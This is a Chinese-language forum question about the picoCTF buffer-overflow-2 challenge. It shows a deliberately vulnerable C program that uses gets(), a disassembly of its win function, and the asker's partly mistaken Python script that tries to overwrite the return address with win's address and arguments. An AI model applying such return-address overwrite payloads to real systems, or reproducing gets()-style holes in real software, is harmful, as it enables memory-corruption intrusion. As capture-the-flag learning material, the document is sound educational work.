缓冲区溢出开发-返回地址重写挑战

Question

我正在处理来自picoCTF的涉及缓冲区溢出的问题，但我被困在一个问题上。该代码包含一个win（arg1，arg2）函数，该函数在调用时将在参数正确的情况下打印该标志。我对重写返回地址时传递参数并不完全熟悉，所以我尝试了一下，并尝试在if语句之后将vuln的返回地址设为win的地址。似乎都没有工作。我也不确定地址前要使用多少个字符，因此我编写了Python程序以使用不同的值。我的实施任何建议将不胜感激！代码如下：

buffer.py：

from subprocess import Popen, PIPE
for i in range(100, 300, 4):
    p = Popen('/home/Ekars12/problems/buffer-overflow-2.2/vuln', stdin=PIPE)
    p.communicate(input='a'*i + '\xde\xc0\xad\xde\xef\xbe\xad\xde\x00\x00x\00\x00\x8b\x85\x04\x08\x8b\x85\x04\x08')
    print(str(i))
for i in range(100, 300, 4):
    p = Popen('/home/Ekars12/problems/buffer-overflow-2.2/vuln', stdin=PIPE)
    p.communicate(input='a'*i + '\xa7\x85\x04\x08')
    print(str(i))

vuln.c：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 100
#define FLAGSIZE 64

void win(unsigned int arg1, unsigned int arg2) {
  if (arg1 != 0xDEADBEEF)
    return;
  if (arg2 != 0xDEADC0DE)
    return;
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

关于win函数的objdump -d vuln的结果是：

0804858b <win>:
804858b:    55                      push   %ebp
804858c:    89 e5                   mov    %esp,%ebp
804858e:    83 ec 58                sub    $0x58,%esp
8048591:    81 7d 08 ef be ad de    cmpl   $0xdeadbeef,0x8(%ebp)
8048598:    74 02                   je     804859c <win+0x11>
804859a:    eb 46                   jmp    80485e2 <win+0x57>
804859c:    81 7d 0c de c0 ad de    cmpl   $0xdeadc0de,0xc(%ebp)
80485a3:    74 02                   je     80485a7 <win+0x1c>
80485a5:    eb 3b                   jmp    80485e2 <win+0x57>
80485a7:    83 ec 08                sub    $0x8,%esp
80485aa:    68 00 87 04 08          push   $0x8048700
80485af:    68 02 87 04 08          push   $0x8048702
80485b4:    e8 b7 fe ff ff          call   8048470 <fopen@plt>
80485b9:    83 c4 10                add    $0x10,%esp
80485bc:    89 45 f4                mov    %eax,-0xc(%ebp)
80485bf:    83 ec 04                sub    $0x4,%esp
80485c2:    ff 75 f4                pushl  -0xc(%ebp)
80485c5:    6a 40                   push   $0x40
80485c7:    8d 45 b4                lea    -0x4c(%ebp),%eax
80485ca:    50                      push   %eax
80485cb:    e8 40 fe ff ff          call   8048410 <fgets@plt>
80485d0:    83 c4 10                add    $0x10,%esp
80485d3:    83 ec 0c                sub    $0xc,%esp
80485d6:    8d 45 b4                lea    -0x4c(%ebp),%eax
80485d9:    50                      push   %eax
80485da:    e8 11 fe ff ff          call   80483f0 <printf@plt>
80485df:    83 c4 10                add    $0x10,%esp
80485e2:    c9                      leave  
80485e3:    c3                      ret